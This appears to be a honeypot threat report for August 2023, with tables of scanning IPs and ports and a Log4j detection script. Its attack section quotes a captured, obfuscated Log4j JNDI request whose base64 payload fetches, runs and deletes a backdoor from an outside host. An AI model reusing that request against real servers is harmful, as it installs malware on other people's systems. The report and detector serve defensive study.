# Overview

Dataset date range: `2023-08-14` to `2023-08-30`

Dataset sources: honeypot systems, web application logs

# Honeypot captures

The following is honeypot capture data; sample count: `209422`.

## Port forwarding

The following is derived from the forwarding logs of the commonly probed ports 3306, 3389 and 6379.

| IP address | Count |
| --------------- | ---: |
| 119.6.58.20 | 35 |
| 167.248.133.124 | 14 |
| 116.169.61.86 | 13 |
| 167.94.138.50 | 13 |
| 103.20.61.19 | 10 |
| 125.77.159.246 | 10 |

## Non-interactive honeypot captures

| IP address | Count |
| --------------- | ---: |
| 87.251.64.11 | 9719 |
| 89.248.163.212 | 7347 |
| 89.248.163.88 | 7263 |
| 89.248.165.95 | 4095 |
| 89.248.163.96 | 3857 |
| 89.248.163.224 | 3739 |
| 45.135.232.28 | 1969 |
| 78.128.114.22 | 1691 |
| 185.161.248.31 | 1346 |
| 89.248.165.83 | 1333 |
| 141.98.11.58 | 1302 |
| 89.248.165.14 | 1265 |
| 123.160.221.18 | 1253 |
| 111.7.96.148 | 1195 |
| 111.7.96.151 | 1191 |
| 152.89.198.113 | 1161 |
| 123.160.221.14 | 1130 |
| 123.160.221.22 | 1113 |
| 141.98.11.119 | 1103 |
| 123.160.221.20 | 1099 |
| 111.7.96.150 | 1059 |
| 111.7.96.147 | 1036 |
| 36.99.136.136 | 1029 |
| 111.7.96.149 | 1019 |
| 36.99.136.137 | 1017 |
| 36.99.136.129 | 1001 |
| 36.99.136.128 | 987 |
| 183.165.238.33 | 972 |
| 125.125.239.123 | 935 |
| 123.160.221.16 | 933 |
| 92.63.196.80 | 904 |
| 178.159.37.98 | 777 |
| 83.97.73.87 | 771 |
| 182.34.201.3 | 764 |
| 92.63.196.58 | 736 |
| 62.122.184.88 | 710 |
| 185.73.124.50 | 659 |
| 89.248.165.88 | 645 |
| 222.129.38.28 | 638 |
| 89.248.163.203 | 638 |
| 91.240.118.187 | 624 |
| 194.26.135.75 | 624 |
| 185.224.128.17 | 575 |
| 89.248.165.32 | 566 |
| 125.125.208.166 | 532 |
| 62.233.50.179 | 531 |
| 179.43.163.134 | 530 |
| 122.230.46.127 | 527 |
| 179.60.147.47 | 518 |

## Port numbers

| Port | Count |
| ----- | ---: |
| 9001 | 4805 |
| 1433 | 2369 |
| 8080 | 1862 |
| 8081 | 1181 |
| 8443 | 1060 |
| 30005 | 767 |
| 5555 | 701 |
| 23 | 652 |
| 5060 | 642 |
| 8888 | 599 |
| 2222 | 587 |
| 10000 | 557 |
| 9090 | 533 |
| 3128 | 514 |
| 82 | 505 |
| 2375 | 491 |
| 9200 | 486 |
| 5900 | 478 |
| 9000 | 448 |
| 554 | 441 |
| 7777 | 432 |
| 8090 | 432 |
| 4433 | 413 |
| 1080 | 409 |
| 8088 | 402 |
| 4444 | 381 |
| 4443 | 379 |
| 9080 | 378 |
| 5000 | 377 |
| 9999 | 365 |
| 3000 | 359 |
| 21 | 356 |
| 3333 | 347 |
| 993 | 336 |
| 8005 | 329 |
| 25 | 325 |
| 5432 | 324 |
| 53 | 319 |
| 3390 | 305 |
| 83 | 302 |

## Attack activity

### log4j

95.214.55.244 launched a Log4j attack. The full request:

```text
b"GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nReferer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBy"
```

After decoding the base64, we obtained `boxshell`, an executable for Linux; sandbox analysis identifies the file as a backdoor trojan, packed with UPX.

### Proxy scanning

| IP | IP | IP | IP | IP | IP |
| --------------- | --------------- | --------------- | --------------- | --------------- | --------------- |
| 1.202.113.37 | 180.95.231.5 | 124.117.198.178 | 60.13.138.48 | 112.193.161.71 | 221.199.72.73 |
| 1.202.114.179 | 180.95.238.130 | 124.133.213.52 | 60.13.138.74 | 112.193.162.199 | 222.172.130.247 |
| 1.83.125.14 | 180.95.238.68 | 124.133.214.35 | 60.13.138.77 | 112.193.170.20 | 222.181.11.112 |
| 1.85.216.17 | 180.95.238.94 | 124.160.236.138 | 60.13.138.80 | 112.193.170.52 | 222.181.11.113 |
| 1.85.216.199 | 182.138.158.10 | 124.31.104.226 | 60.13.6.63 | 112.193.193.246 | 222.181.11.227 |
| 1.85.217.12 | 182.138.158.107 | 124.31.105.196 | 60.13.7.20 | 112.193.194.55 | 222.181.11.251 |
| 1.85.217.216 | 182.138.158.111 | 124.31.106.104 | 60.13.7.59 | 112.66.104.157 | 222.181.11.38 |
| 1.85.218.214 | 182.138.158.171 | 124.31.106.85 | 60.13.7.93 | 112.66.105.132 | 222.181.11.54 |
| 1.85.218.228 | 182.138.158.179 | 124.31.107.16 | 60.17.102.104 | 112.66.105.147 | 222.181.11.79 |
| 1.85.218.24 | 182.138.158.208 | 124.90.215.128 | 60.17.104.150 | 112.66.109.204 | 222.94.140.11 |
| 1.85.219.118 | 182.138.158.236 | 124.90.49.183 | 60.17.106.35 | 112.66.109.6 | 222.94.140.136 |
| 101.204.251.226 | 171.37.38.126 | 123.191.147.58 | 59.50.182.7 | 111.224.249.230 | 220.173.208.242 |
| 101.67.137.97 | 182.138.158.241 | 124.90.53.250 | 60.17.112.221 | 112.66.110.175 | 222.94.140.141 |
| 101.67.138.140 | 182.138.158.57 | 125.84.236.252 | 60.17.118.4 | 112.66.111.54 | 222.94.140.19 |
| 101.67.138.98 | 182.242.169.141 | 125.84.239.207 | 60.17.122.195 | 112.94.188.46 | 222.94.140.206 |
| 101.68.126.4 | 182.242.169.33 | 139.170.202.124 | 60.17.97.34 | 112.94.188.54 | 222.94.140.230 |
| 101.71.208.62 | 182.242.170.169 | 139.170.202.250 | 60.17.97.6 | 113.200.72.204 | 222.94.140.58 |
| 101.71.208.95 | 182.242.180.170 | 139.170.202.77 | 61.181.2.72 | 113.206.179.87 | 222.94.140.83 |
| 101.71.211.117 | 182.245.27.53 | 139.170.203.176 | 61.52.72.219 | 113.206.181.7 | 222.94.163.31 |
| 110.177.176.205 | 182.245.45.82 | 139.170.203.245 | 61.52.74.204 | 113.206.183.206 | 223.166.22.196 |
| 110.177.176.75 | 182.245.57.157 | 139.170.203.81 | 61.52.82.146 | 113.206.199.16 | 223.166.22.205 |
| 110.177.178.246 | 182.245.81.69 | 14.204.44.110 | 61.52.86.112 | 114.100.176.36 | 223.166.22.207 |
| 110.177.179.95 | 182.88.78.220 | 140.224.64.218 | 64.62.197.101 | 114.100.176.47 | 223.166.22.217 |
| 110.177.182.10 | 183.134.184.93 | 140.224.64.237 | 64.62.197.106 | 114.100.177.136 | 223.166.22.231 |
| 110.52.194.174 | 183.185.109.107 | 144.123.92.16 | 64.62.197.12 | 114.100.177.178 | 223.166.22.245 |
| 110.52.195.162 | 183.185.109.249 | 144.255.16.82 | 64.62.197.131 | 114.100.177.196 | 223.166.22.246 |
| 110.52.195.196 | 183.191.123.232 | 144.255.17.58 | 64.62.197.146 | 114.100.177.215 | 223.166.22.254 |
| 110.52.216.111 | 183.191.126.27 | 144.255.18.16 | 64.62.197.147 | 114.100.177.44 | 223.166.22.33 |
| 110.52.216.136 | 184.105.139.68 | 144.255.31.200 | 64.62.197.157 | 115.148.153.197 | 223.166.22.85 |
| 110.53.241.169 | 184.105.247.254 | 144.255.31.206 | 64.62.197.168 | 116.52.105.32 | 223.166.22.97 |
| 110.80.168.25 | 216.218.206.108 | 144.255.31.28 | 64.62.197.194 | 116.54.33.105 | 27.184.93.224 |
| 110.80.169.219 | 216.218.206.69 | 144.255.31.86 | 64.62.197.209 | 117.13.170.16 | 27.227.186.67 |
| 111.162.137.43 | 218.95.226.197 | 150.255.123.182 | 64.62.197.225 | 117.13.171.35 | 27.227.186.78 |
| 111.162.140.99 | 218.95.226.247 | 150.255.182.161 | 64.62.197.237 | 117.14.114.186 | 27.227.186.80 |
| 111.162.145.216 | 218.95.234.148 | 150.255.39.159 | 64.62.197.239 | 117.14.146.248 | 27.227.187.142 |
| 111.162.146.235 | 218.95.234.172 | 171.116.202.37 | 64.62.197.31 | 117.14.151.192 | 27.227.187.215 |
| 111.162.151.170 | 219.143.174.194 | 171.118.64.119 | 64.62.197.36 | 117.14.153.161 | 27.47.24.29 |
| 111.162.152.29 | 219.143.174.230 | 171.12.10.121 | 64.62.197.42 | 117.15.91.35 | 27.47.24.3 |
| 111.162.159.21 | 219.143.174.38 | 171.12.10.13 | 64.62.197.62 | 117.25.124.24 | 27.47.25.142 |
| 111.224.218.166 | 219.157.201.137 | 171.12.10.244 | 64.62.197.67 | 117.25.124.99 | 27.47.25.17 |
| 111.224.221.47 | 220.173.208.101 | 171.120.158.36 | 64.62.197.72 | 118.81.86.237 | 27.98.228.163 |
| 111.224.234.126 | 220.173.208.170 | 171.34.176.161 | 64.62.197.97 | 119.163.40.100 | 27.98.228.250 |
| 111.224.235.50 | 220.173.208.189 | 171.34.176.211 | 65.49.1.103 | 119.164.100.244 | 36.106.166.192 |
| 119.164.106.77 | 36.106.167.158 | 122.96.28.234 | 43.248.108.133 | 123.191.131.241 | 59.173.181.75 |
| 119.164.97.179 | 36.106.167.232 | 122.96.28.40 | 43.248.108.232 | 123.191.134.183 | 59.50.180.152 |
| 119.60.104.11 | 36.106.167.86 | 122.96.28.7 | 43.248.108.248 | 123.145.3.247 | 58.19.56.69 |
| 119.60.104.252 | 36.20.61.188 | 123.144.23.138 | 58.19.10.233 | 123.145.30.16 | 58.19.59.156 |
| 119.60.104.29 | 36.20.61.219 | 123.144.27.159 | 58.19.45.215 | 123.145.6.133 | 58.19.59.171 |
| 119.60.104.70 | 36.24.136.64 | 123.144.27.241 | 58.19.47.147 | 123.158.48.188 | 58.19.59.251 |
| 119.60.104.97 | 36.24.139.22 | 123.145.12.136 | 58.19.47.29 | 119.60.105.77 | 36.32.2.211 |
| 119.60.105.103 | 36.24.139.228 | 123.145.12.137 | 58.19.47.95 | 120.0.52.129 | 36.32.2.216 |
| 119.60.105.141 | 36.32.2.166 | 123.145.17.155 | 58.19.50.106 | 120.0.52.195 | 36.32.2.220 |
| 119.60.105.207 | 36.32.2.176 | 123.145.18.171 | 58.19.51.104 | 120.0.52.217 | 36.32.2.26 |
| 119.60.105.230 | 36.32.2.190 | 123.145.21.130 | 58.19.56.34 | | |
| 123.245.24.219 | 171.8.138.141 | 123.245.24.213 | 59.50.183.46 | 111.224.7.51 | 220.250.10.152 |
| 123.245.25.28 | 171.8.138.70 | 123.245.24.52 | 59.52.100.117 | 111.85.200.101 | 220.250.10.59 |
| 124.235.138.240 | 171.8.138.88 | 123.245.24.57 | 59.52.102.228 | 111.85.200.112 | 220.250.11.114 |
| 171.12.10.150 | 175.152.28.77 | 123.245.24.74 | 59.52.179.0 | 111.85.200.150 | 220.250.11.214 |
| 171.34.177.234 | 65.49.1.114 | 120.0.52.23 | 36.32.2.66 | 119.164.102.167 | 36.106.166.210 |
| 171.34.178.172 | 65.49.1.21 | 120.0.52.233 | 36.32.2.86 | 123.158.61.89 | 58.19.61.2 |
| 171.34.178.175 | 65.49.1.28 | 121.29.178.124 | 36.5.68.104 | 123.160.172.117 | 58.19.76.227 |
| 171.36.130.155 | 65.49.1.68 | 121.29.178.203 | 36.5.68.231 | 123.160.173.32 | 59.173.180.169 |
| 171.36.130.90 | 65.49.1.71 | 121.29.178.208 | 36.5.69.7 | 123.160.173.66 | 59.173.180.175 |
| 171.36.96.33 | 65.49.1.81 | 121.29.178.72 | 42.48.78.24 | 123.160.234.86 | 59.173.180.51 |
| 171.37.175.242 | 65.49.1.99 | 122.96.28.141 | 42.48.78.28 | 123.163.114.173 | 59.173.180.8 |
| 171.37.179.178 | 65.49.20.68 | 122.96.28.199 | 42.48.79.131 | 123.163.114.198 | 59.173.181.232 |
| 171.37.182.47 | 74.82.47.18 | 122.96.28.230 | 42.63.253.205 | 123.191.130.169 | 59.173.181.64 |
| 182.138.158.180 | 175.152.29.228 | 123.245.25.125 | 59.55.114.158 | 111.85.200.151 | 220.250.62.47 |
| 182.138.158.77 | 175.152.32.132 | 123.245.25.128 | 59.55.114.207 | 111.85.200.199 | 220.250.63.34 |
| 184.105.139.70 | 175.152.33.165 | 124.117.192.228 | 60.13.138.135 | 111.85.200.245 | 220.250.63.35 |
| 184.105.247.195 | 180.109.49.11 | 124.117.193.189 | 60.13.138.138 | 111.85.200.33 | 221.11.51.25 |
| 216.218.206.67 | 180.95.231.110 | 124.117.195.37 | 60.13.138.157 | 111.85.200.64 | 221.11.51.27 |
| 220.173.208.23 | 180.95.231.126 | 124.117.197.213 | 60.13.138.161 | 111.85.200.89 | 221.11.60.150 |
| 38.45.217.2 | 171.37.66.231 | 123.245.24.141 | 59.50.183.171 | 111.224.249.76 | 220.173.209.17 |
| 60.191.125.35 | 171.37.207.229 | 123.191.144.35 | 59.50.181.2 | 123.191.137.240 | 59.50.180.46 |
| 65.49.20.66 | 180.95.231.161 | 124.117.198.100 | 60.13.138.172 | 112.117.17.13 | 221.14.175.86 |
| 74.82.47.2 | 180.95.231.21 | 124.117.198.160 | 60.13.138.242 | 112.193.161.100 | 221.199.65.97 |
| 74.82.47.5 | 171.8.138.132 | 123.245.24.18 | 59.50.183.27 | 111.224.6.98 | 220.177.9.114 |

# Combined summary

| IP | Type | Count |
| ---------------- | ---------------- | ---: |
| 89.248.163.212 | honeypot | 226 |
| 89.248.163.88 | honeypot | 222 |
| 89.248.163.224 | honeypot | 105 |
| 89.248.163.96 | honeypot | 100 |
| 220.196.160.0/24 | web service | 76 |
| 78.128.114.22 | honeypot | 49 |
| 141.98.11.58 | honeypot | 39 |
| 141.98.11.119 | honeypot | 32 |
| 180.101.245.0/24 | web service | 26 |
| 178.159.37.98 | honeypot | 23 |
| 194.26.135.75 | honeypot | 20 |
| 87.251.64.11 | honeypot | 19 |
| 89.248.165.95 | honeypot | 18 |
| 62.122.184.88 | honeypot | 16 |
| 163.53.194.58 | honeypot | 14 |
| 91.240.118.187 | honeypot | 14 |
| 59.83.208.0/24 | web service | 14 |
| 117.187.173.115 | honeypot | 9 |
| 223.111.175.115 | honeypot | 9 |
| 117.187.173.106 | honeypot | 8 |
| 180.101.244.0/24 | web service | 8 |
| 36.99.136.128 | honeypot | 8 |
| 117.187.173.72 | honeypot | 7 |
| 45.135.232.28 | honeypot | 7 |
| 117.187.173.99 | honeypot | 7 |
| 213.226.123.100 | honeypot | 7 |
| 223.111.175.106 | honeypot | 7 |
| 223.111.175.110 | honeypot | 7 |
| 223.111.175.33 | honeypot | 7 |
| 117.187.173.45 | honeypot | 7 |
| 117.187.173.120 | honeypot | 7 |
| 118.31.118.27 | honeypot | 7 |
| 117.187.173.90 | honeypot | 7 |
| 36.99.136.136 | honeypot | 7 |
| 117.187.173.48 | honeypot | 6 |
| 223.111.175.113 | honeypot | 6 |
| 117.187.173.38 | honeypot | 6 |
| 223.111.175.104 | honeypot | 6 |
| 223.111.175.35 | honeypot | 6 |
| 223.111.175.117 | honeypot | 6 |
| 117.187.173.97 | honeypot | 6 |
| 117.187.173.121 | honeypot | 6 |
| 36.99.136.129 | honeypot | 6 |
| 223.111.175.36 | honeypot | 5 |
| 117.187.173.119 | honeypot | 5 |
| 117.187.173.69 | honeypot | 5 |
| 62.233.50.179 | honeypot | 5 |
| 117.187.173.100 | honeypot | 5 |
| 223.111.175.107 | honeypot | 5 |
| 117.187.173.76 | honeypot | 5 |
| 117.187.173.67 | honeypot | 5 |
| 80.66.76.32 | honeypot | 5 |
| 80.94.92.12 | honeypot | 5 |
| 223.111.175.32 | honeypot | 5 |
| 117.187.173.108 | honeypot | 5 |
| 92.205.107.64 | page enumeration | 1 |
| 149.56.150.3 | page enumeration | 1 |
| 15.204.136.222 | page enumeration | 1 |
| 172.232.53.42 | page enumeration | 1 |
| 147.78.47.122 | page enumeration | 1 |
| 98.66.138.129 | page enumeration | 1 |
| 42.3.27.207 | page enumeration | 1 |
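The Log4j request captured in the attack-activity section above hides `jndi:ldap://` behind `${env:NaN:-x}` lookups, each of which evaluates to its `:-` default because no `NaN` environment variable exists, and carries its payload as a base64 path segment. The following is an added example, not code from the original report, of a defender-side header check: it resolves that class of lookup (`:-` defaults, `lower:`/`upper:`) before matching, flags any header that normalizes to a `${jndi:` lookup, extracts the callback endpoint, and decodes the base64 segment for triage. The sample headers, the callback `ldap://198.51.100.7:1389` and the base64 content are constructed for the example and are not values from the capture.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Innermost lookup: a ${...} whose body contains no further $, { or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization, any surviving ${jndi: lookup is the detection signal.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_CALLBACK = re.compile(r"jndi\s*:\s*(\w+)://([^/\s}]+)", re.IGNORECASE)
_B64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def _resolve(body: str) -> Optional[str]:
    """Evaluate one lookup the way Log4j 2 would when the key is undefined.

    ${env:NaN:-j} -> "j"  (":-" default; NaN is not set)
    ${::-j}       -> "j"
    ${lower:J}    -> "j"
    ${upper:j}    -> "J"
    Anything else (for example the final ${jndi:...}) is left in place.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def normalize_lookups(value: str, max_rounds: int = 50) -> str:
    """Collapse innermost resolvable lookups, repeating until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def _sub(match: re.Match) -> str:
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        value = _INNER.sub(_sub, value)
        if not changed:
            break
    return value


@dataclass
class Finding:
    header: str
    normalized: str
    callback: Optional[str]         # scheme://host:port the lookup would contact
    decoded_payload: Optional[str]  # base64 path segment, decoded for triage only


def scan_headers(headers: Dict[str, str]) -> List[Finding]:
    """Return one Finding per header that normalizes to a JNDI lookup."""
    findings: List[Finding] = []
    for name, raw in headers.items():
        normalized = normalize_lookups(raw)
        if not _JNDI.search(normalized):
            continue
        cb = _CALLBACK.search(normalized)
        callback = f"{cb.group(1).lower()}://{cb.group(2)}" if cb else None
        decoded = None
        seg = _B64_SEGMENT.search(normalized)
        if seg:
            try:
                decoded = base64.b64decode(seg.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = None  # not valid base64; the raw segment stays in `normalized`
        findings.append(Finding(name, normalized, callback, decoded))
    return findings


# Constructed sample request headers: hypothetical callback host 198.51.100.7 and a
# harmless payload, in the same obfuscation shape as the captured request.
_SAMPLE_PAYLOAD = base64.b64encode(b"echo constructed-sample").decode()
SAMPLE_HEADERS = {
    "Accept": "application/json, text/plain, */*",
    "X-Api-Version": (
        "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
        "//198.51.100.7:1389/Constructed/Command/Base64/" + _SAMPLE_PAYLOAD + "}')"
    ),
    "User-Agent": "Mozilla/5.0 (constructed benign value)",
}

if __name__ == "__main__":
    for f in scan_headers(SAMPLE_HEADERS):
        print(f"{f.header}: callback={f.callback} payload={f.decoded_payload!r}")
```

Normalizing before matching is the point: a rule that looks for the literal string `jndi` misses the captured request, because the letters `j` and `l` only appear after the `${env:NaN:-...}` defaults are resolved. Any header that normalizes to `${jndi:` is a block-and-alert signal; the decoded segment is handed to sandbox analysis, as the report did with `boxshell`, never executed.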
1 comment

NTM captured 141.98.11.119 brute-forcing SSH and RDP